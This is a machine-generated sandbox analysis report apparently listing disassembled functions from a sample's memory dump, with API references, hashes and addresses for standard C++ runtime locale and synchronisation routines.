Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registerctype
String ID: 2Z
API String ID: 83828444-2484645983
Opcode ID: 969d1fd714598208786977f35ac60307c84a1b35b562701d33c5fb3feae79a8c
Instruction ID: 023acd1c32fdc7d763be7d2aa10ab99fe9e316132bb44beb09bc041dbf9f9621
Opcode Fuzzy Hash: 969d1fd714598208786977f35ac60307c84a1b35b562701d33c5fb3feae79a8c
Instruction Fuzzy Hash: DE018E3590111A9FCF14EBA48819AAD7FA1BF94720F65080AE411AB291DF309E44CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 005925E3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 005925EA
std::_Lockit::_Lockit.LIBCPMT ref: 005925F4

Part of subcall function 00588C20: std::_Lockit::_Lockit.LIBCPMT ref: 00588C50
Part of subcall function 00588C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00588C78

messages.LIBCPMT ref: 0059262E
std::_Facet_Register.LIBCPMT ref: 00592645
std::_Lockit::~_Lockit.LIBCPMT ref: 00592665

Strings

2Z, xrefs: 00592652

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
String ID: 2Z
API String ID: 2750803064-2484645983
Opcode ID: 29f676cd36c3f94d96fccf3995319d1fcbf8d6487f3d48a584a62c1470db8f0a
Instruction ID: 2d7069535d63d8dd3d9074148d8f7d3021356a0e83a1ce15c228b00317111b8c
Opcode Fuzzy Hash: 29f676cd36c3f94d96fccf3995319d1fcbf8d6487f3d48a584a62c1470db8f0a
Instruction Fuzzy Hash: A701AD3590111AAFCF11ABA4D819ABEBFB1BFD4710F24480AF8116B291CF709E01DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00592678 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0059267F
std::_Lockit::_Lockit.LIBCPMT ref: 00592689

Part of subcall function 00588C20: std::_Lockit::_Lockit.LIBCPMT ref: 00588C50
Part of subcall function 00588C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00588C78

messages.LIBCPMT ref: 005926C3
std::_Facet_Register.LIBCPMT ref: 005926DA
std::_Lockit::~_Lockit.LIBCPMT ref: 005926FA

Strings

2Z, xrefs: 005926E7

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
String ID: 2Z
API String ID: 2750803064-2484645983
Opcode ID: 14490ae0dc4e09d1e34ad4a51026a6448820d4c192a6a3d48a72a3484cfd948c
Instruction ID: 0db048b6570e5e9cb2f9f963e3528912604270e7a2f47064be95e33528150516
Opcode Fuzzy Hash: 14490ae0dc4e09d1e34ad4a51026a6448820d4c192a6a3d48a72a3484cfd948c
Instruction Fuzzy Hash: 4A01AD3590011AAFCF11ABA4C809ABEBFB1BFD4720F24080AF8106B291CF709E059B91

Uniqueness

Uniqueness Score: -1.00%

Function 0059E843 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0059E84A
std::_Lockit::_Lockit.LIBCPMT ref: 0059E854

Part of subcall function 00588C20: std::_Lockit::_Lockit.LIBCPMT ref: 00588C50
Part of subcall function 00588C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00588C78

collate.LIBCPMT ref: 0059E88E
std::_Facet_Register.LIBCPMT ref: 0059E8A5
std::_Lockit::~_Lockit.LIBCPMT ref: 0059E8C5

Strings

2Z, xrefs: 0059E8B2

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
String ID: 2Z
API String ID: 1007100420-2484645983
Opcode ID: d1d1b3e173c906efdf1f689c25c922675a883a056f3de68c2203ad9df2292d47
Instruction ID: 5ce154a1e9c1377baef86804905c700a8382dcb2deb09b6117d15b2530964216
Opcode Fuzzy Hash: d1d1b3e173c906efdf1f689c25c922675a883a056f3de68c2203ad9df2292d47
Instruction Fuzzy Hash: CF01AD3590011A9FCF14EBA4881AABEBFB1BFD8710F24480AF8116B2D1CF349E058B91

Uniqueness

Uniqueness Score: -1.00%

Function 0059E8D8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0059E8DF
std::_Lockit::_Lockit.LIBCPMT ref: 0059E8E9

Part of subcall function 00588C20: std::_Lockit::_Lockit.LIBCPMT ref: 00588C50
Part of subcall function 00588C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00588C78

messages.LIBCPMT ref: 0059E923
std::_Facet_Register.LIBCPMT ref: 0059E93A
std::_Lockit::~_Lockit.LIBCPMT ref: 0059E95A

Strings

2Z, xrefs: 0059E947

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
String ID: 2Z
API String ID: 2750803064-2484645983
Opcode ID: 840475482a0ee137081bd108383b0e5c3b163dfa046f23aebf6c0779a09765f7
Instruction ID: 6c6902620adb049505f3bda538b8cd97f807a9e273da73768f5f163e6ac630c1
Opcode Fuzzy Hash: 840475482a0ee137081bd108383b0e5c3b163dfa046f23aebf6c0779a09765f7
Instruction Fuzzy Hash: 7B01AD3590011A9FCF14EBA4884AABE7FB1BFC4720F25080AF8106B291CF349E018B91

Uniqueness

Uniqueness Score: -1.00%

Function 00592961 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00592968
std::_Lockit::_Lockit.LIBCPMT ref: 00592972

Part of subcall function 00588C20: std::_Lockit::_Lockit.LIBCPMT ref: 00588C50
Part of subcall function 00588C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00588C78

moneypunct.LIBCPMT ref: 005929AC
std::_Facet_Register.LIBCPMT ref: 005929C3
std::_Lockit::~_Lockit.LIBCPMT ref: 005929E3

Strings

2Z, xrefs: 005929D0

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
String ID: 2Z
API String ID: 419941038-2484645983
Opcode ID: f24ce3a251b93e7ddc57cbd6dda60451c038bd73a78ba787db05d34a9b4cd9ab
Instruction ID: 05f1056c3db60cb719e89a1df790180d1cd7bacbb448023c0bcfc64920a108a0
Opcode Fuzzy Hash: f24ce3a251b93e7ddc57cbd6dda60451c038bd73a78ba787db05d34a9b4cd9ab
Instruction Fuzzy Hash: 1C01AD3590111AEFCF10ABA4C81AABEBFB1BFC4710F24090AF8106B291DF309E459B91

Uniqueness

Uniqueness Score: -1.00%

Function 005929F6 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 005929FD
std::_Lockit::_Lockit.LIBCPMT ref: 00592A07

Part of subcall function 00588C20: std::_Lockit::_Lockit.LIBCPMT ref: 00588C50
Part of subcall function 00588C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00588C78

moneypunct.LIBCPMT ref: 00592A41
std::_Facet_Register.LIBCPMT ref: 00592A58
std::_Lockit::~_Lockit.LIBCPMT ref: 00592A78

Strings

2Z, xrefs: 00592A65

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
String ID: 2Z
API String ID: 419941038-2484645983
Opcode ID: 9c0273ad53856c7e71c223d950144119748dd1fa451c66cd63d2d9652c7d2ffa
Instruction ID: 8a1388ce46069bc1936004018983a9a53a02b78c6e8427212cb8d1c92b1f1125
Opcode Fuzzy Hash: 9c0273ad53856c7e71c223d950144119748dd1fa451c66cd63d2d9652c7d2ffa
Instruction Fuzzy Hash: CA01A13690011AEFCF11EBA4C859ABE7FB5BFD4710F24040AF8016B291DF749E018790

Uniqueness

Uniqueness Score: -1.00%

Function 0059EA97 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0059EA9E
std::_Lockit::_Lockit.LIBCPMT ref: 0059EAA8

Part of subcall function 00588C20: std::_Lockit::_Lockit.LIBCPMT ref: 00588C50
Part of subcall function 00588C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00588C78

moneypunct.LIBCPMT ref: 0059EAE2
std::_Facet_Register.LIBCPMT ref: 0059EAF9
std::_Lockit::~_Lockit.LIBCPMT ref: 0059EB19

Strings

2Z, xrefs: 0059EB06

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
String ID: 2Z
API String ID: 419941038-2484645983
Opcode ID: f5dab70877fb876e70a45389582ad916a5c200345d1d1ba1ea200a421c6bc4ad
Instruction ID: 6a60c5ef702c47b869263d1e1f3b65bf16719eaf96d1b02ed61c189c51a77da5
Opcode Fuzzy Hash: f5dab70877fb876e70a45389582ad916a5c200345d1d1ba1ea200a421c6bc4ad
Instruction Fuzzy Hash: 2801A13590011A9FCF10EBA4980AABE7FB1BFD4720F24080AF4016B2D2DF349E018791

Uniqueness

Uniqueness Score: -1.00%

Function 00592A8B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00592A92
std::_Lockit::_Lockit.LIBCPMT ref: 00592A9C

Part of subcall function 00588C20: std::_Lockit::_Lockit.LIBCPMT ref: 00588C50
Part of subcall function 00588C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00588C78

moneypunct.LIBCPMT ref: 00592AD6
std::_Facet_Register.LIBCPMT ref: 00592AED
std::_Lockit::~_Lockit.LIBCPMT ref: 00592B0D

Strings

2Z, xrefs: 00592AFA

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
String ID: 2Z
API String ID: 419941038-2484645983
Opcode ID: 73d3032deb8f3a0fcfe28cc06ff175e9a44fbafefc3c6eed935415616442b36c
Instruction ID: d1cff9ab4d56f59cbaf653996057c762a4cc4a7cc3b72dd6aa53254fa7a81624
Opcode Fuzzy Hash: 73d3032deb8f3a0fcfe28cc06ff175e9a44fbafefc3c6eed935415616442b36c
Instruction Fuzzy Hash: DF018E3590011A9FCF11ABA49819BBE7FA1BFD4720F14080AF8016B292CF709E01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0059EB2C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0059EB33
std::_Lockit::_Lockit.LIBCPMT ref: 0059EB3D

Part of subcall function 00588C20: std::_Lockit::_Lockit.LIBCPMT ref: 00588C50
Part of subcall function 00588C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00588C78

moneypunct.LIBCPMT ref: 0059EB77
std::_Facet_Register.LIBCPMT ref: 0059EB8E
std::_Lockit::~_Lockit.LIBCPMT ref: 0059EBAE

Strings

2Z, xrefs: 0059EB9B

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
String ID: 2Z
API String ID: 419941038-2484645983
Opcode ID: bb97149133bd34cda0cfb2edd3fe2e33bed1999213edf8c26e398c40f3494f39
Instruction ID: ae838b7dc9ad1e9ef1dde434999cba22bb6bc2e56832912713bb466d28010114
Opcode Fuzzy Hash: bb97149133bd34cda0cfb2edd3fe2e33bed1999213edf8c26e398c40f3494f39
Instruction Fuzzy Hash: 6101A135900116DFCF10EBA4989AABEBFB5BFC4710F15080AF4116B2D1CF709E058B91

Uniqueness

Uniqueness Score: -1.00%

Function 00592B20 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00592B27
std::_Lockit::_Lockit.LIBCPMT ref: 00592B31

Part of subcall function 00588C20: std::_Lockit::_Lockit.LIBCPMT ref: 00588C50
Part of subcall function 00588C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00588C78

moneypunct.LIBCPMT ref: 00592B6B
std::_Facet_Register.LIBCPMT ref: 00592B82
std::_Lockit::~_Lockit.LIBCPMT ref: 00592BA2

Strings

2Z, xrefs: 00592B8F

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
String ID: 2Z
API String ID: 419941038-2484645983
Opcode ID: c47325038a4eb01d53ff03afe7a6154a5bb2ab3e1067cbcf29363a83d08a8626
Instruction ID: ca8646bd1411d2a262267144696ac4a7500f6dc10007cba323a9623642c882e6
Opcode Fuzzy Hash: c47325038a4eb01d53ff03afe7a6154a5bb2ab3e1067cbcf29363a83d08a8626
Instruction Fuzzy Hash: D601C435900616DFCF15EBA48849ABD7FB1BFC4720F24040AF5016B2D1DF349E049791

Uniqueness

Uniqueness Score: -1.00%

Function 00592D74 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00592D7B
std::_Lockit::_Lockit.LIBCPMT ref: 00592D85

Part of subcall function 00588C20: std::_Lockit::_Lockit.LIBCPMT ref: 00588C50
Part of subcall function 00588C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00588C78

numpunct.LIBCPMT ref: 00592DBF
std::_Facet_Register.LIBCPMT ref: 00592DD6
std::_Lockit::~_Lockit.LIBCPMT ref: 00592DF6

Strings

2Z, xrefs: 00592DE3

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
String ID: 2Z
API String ID: 743221004-2484645983
Opcode ID: c3f1a86e51ff174239b2310c4a9466ce69cc8b90270257570d74dba507eeb32e
Instruction ID: 22cbf68d439642ae60f6d9ae6d053eefee3afe2e2e008b77c6f7914b58836b84
Opcode Fuzzy Hash: c3f1a86e51ff174239b2310c4a9466ce69cc8b90270257570d74dba507eeb32e
Instruction Fuzzy Hash: 0301A1359052169FCF11ABA4D819ABD7FB5BFD4710F14080AF4107B291DF709E019B91

Uniqueness

Uniqueness Score: -1.00%

Function 005B2DEE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,F302A5AA,0000000C,?,00000000,005C6A6C,000000FF,?,005B2DC1,?,?,005B2D95,?), ref: 005B2E23
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005B2E35
FreeLibrary.KERNEL32(00000000,?,00000000,005C6A6C,000000FF,?,005B2DC1,?,?,005B2D95,?), ref: 005B2E57

Strings

2Z, xrefs: 005B2E46
mscoree.dll, xrefs: 005B2E1C
CorExitProcess, xrefs: 005B2E2D

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: 2Z$CorExitProcess$mscoree.dll
API String ID: 4061214504-2418487760
Opcode ID: 0c2c1a0020a232de6f502f46db4479caf0bc37d4215d37bd2931a2c43128b7e8
Instruction ID: 8c7df011ab4655a5ac6ca32d5364c6711c30668f99e1f7dcb0c8e5544fe0da6d
Opcode Fuzzy Hash: 0c2c1a0020a232de6f502f46db4479caf0bc37d4215d37bd2931a2c43128b7e8
Instruction Fuzzy Hash: E801627691861DEFDB128F91DC05FAEBFB8FB08B15F044529F811A26A0DB749904DE90

Uniqueness

Uniqueness Score: -1.00%

Function 005A2C4E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(005DDD3C,?,?,00582427,005DE638,005C6B40), ref: 005A2C58
LeaveCriticalSection.KERNEL32(005DDD3C,?,?,00582427,005DE638,005C6B40), ref: 005A2C8B
RtlWakeAllConditionVariable.NTDLL ref: 005A2D02
SetEvent.KERNEL32(?,00582427,005DE638,005C6B40), ref: 005A2D0C
ResetEvent.KERNEL32(?,00582427,005DE638,005C6B40), ref: 005A2D18

Strings

2Z, xrefs: 005A2CFC

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
String ID: 2Z
API String ID: 3916383385-2484645983
Opcode ID: c12010ff234a96720ca82d370fe5792e9c41324320f072e3e3022c3c9faad7f0
Instruction ID: 9b1710f8ba4243b9bd63bd4febc57bfc4acd484dbb30902fca29aeb7d1ae8e79
Opcode Fuzzy Hash: c12010ff234a96720ca82d370fe5792e9c41324320f072e3e3022c3c9faad7f0
Instruction Fuzzy Hash: 57014631506A24DFCB25AF18FC08E987BB6FB69751704046BF80293320CB701805EFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00598969 Relevance: 9.4, APIs: 6, Instructions: 449COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00598970
ctype.LIBCPMT ref: 005989B7

Part of subcall function 0059851C: __Getctype.LIBCPMT ref: 0059852B

Part of subcall function 0059270D: __EH_prolog3.LIBCMT ref: 00592714
Part of subcall function 0059270D: std::_Lockit::_Lockit.LIBCPMT ref: 0059271E
Part of subcall function 0059270D: std::_Lockit::~_Lockit.LIBCPMT ref: 0059278F

Part of subcall function 0058F3D9: __EH_prolog3.LIBCMT ref: 0058F3E0
Part of subcall function 0058F3D9: std::_Lockit::_Lockit.LIBCPMT ref: 0058F3EA
Part of subcall function 0058F3D9: std::_Lockit::~_Lockit.LIBCPMT ref: 0058F48E

Part of subcall function 00592837: __EH_prolog3.LIBCMT ref: 0059283E
Part of subcall function 00592837: std::_Lockit::_Lockit.LIBCPMT ref: 00592848
Part of subcall function 00592837: std::_Lockit::~_Lockit.LIBCPMT ref: 005928B9

Part of subcall function 0058F3D9: Concurrency::cancel_current_task.LIBCPMT ref: 0058F499

Part of subcall function 005929F6: __EH_prolog3.LIBCMT ref: 005929FD
Part of subcall function 005929F6: std::_Lockit::_Lockit.LIBCPMT ref: 00592A07
Part of subcall function 005929F6: std::_Lockit::~_Lockit.LIBCPMT ref: 00592A78

Part of subcall function 00592961: __EH_prolog3.LIBCMT ref: 00592968
Part of subcall function 00592961: std::_Lockit::_Lockit.LIBCPMT ref: 00592972
Part of subcall function 00592961: std::_Lockit::~_Lockit.LIBCPMT ref: 005929E3

collate.LIBCPMT ref: 00598B05
numpunct.LIBCPMT ref: 00598DAF
__Getcoll.LIBCPMT ref: 00598B47

Part of subcall function 00588C20: std::_Lockit::_Lockit.LIBCPMT ref: 00588C50
Part of subcall function 00588C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00588C78

Part of subcall function 00586330: LocalAlloc.KERNEL32(00000040,?,00590E04,00000020,?,?,00589942,00000000,F302A5AA,?,?,?,?,005C50DD,000000FF), ref: 00586336

codecvt.LIBCPMT ref: 00598E6D

Part of subcall function 00592E09: __EH_prolog3.LIBCMT ref: 00592E10
Part of subcall function 00592E09: std::_Lockit::_Lockit.LIBCPMT ref: 00592E1A
Part of subcall function 00592E09: std::_Lockit::~_Lockit.LIBCPMT ref: 00592E8B

Part of subcall function 00592F33: __EH_prolog3.LIBCMT ref: 00592F3A
Part of subcall function 00592F33: std::_Lockit::_Lockit.LIBCPMT ref: 00592F44
Part of subcall function 00592F33: std::_Lockit::~_Lockit.LIBCPMT ref: 00592FB5

Part of subcall function 005922FA: __EH_prolog3.LIBCMT ref: 00592301
Part of subcall function 005922FA: std::_Lockit::_Lockit.LIBCPMT ref: 0059230B
Part of subcall function 005922FA: std::_Lockit::~_Lockit.LIBCPMT ref: 0059237C

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: Lockitstd::_$H_prolog3Lockit::_Lockit::~_$AllocConcurrency::cancel_current_taskGetcollGetctypeLocalcodecvtcollatectypenumpunct
String ID:
API String ID: 3494022857-0
Opcode ID: e6eee1bb7e7cd55e5154bcb6458009eb348de70aa5bac6316ecd695811ea07b0
Instruction ID: 566029d85371ce8f7601fc19aba8e93e22b7cfae9cfeee64ef28ba64ac76e02d
Opcode Fuzzy Hash: e6eee1bb7e7cd55e5154bcb6458009eb348de70aa5bac6316ecd695811ea07b0
Instruction Fuzzy Hash: D1E17671901216AADF107FA4894AA7F7EA5FF86750F14482EFC097B381DF754D0097A2

Uniqueness

Uniqueness Score: -1.00%

Function 0058B500 Relevance: 9.2, APIs: 6, Instructions: 151memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0058B531
std::_Lockit::_Lockit.LIBCPMT ref: 0058B54F
std::_Lockit::~_Lockit.LIBCPMT ref: 0058B577
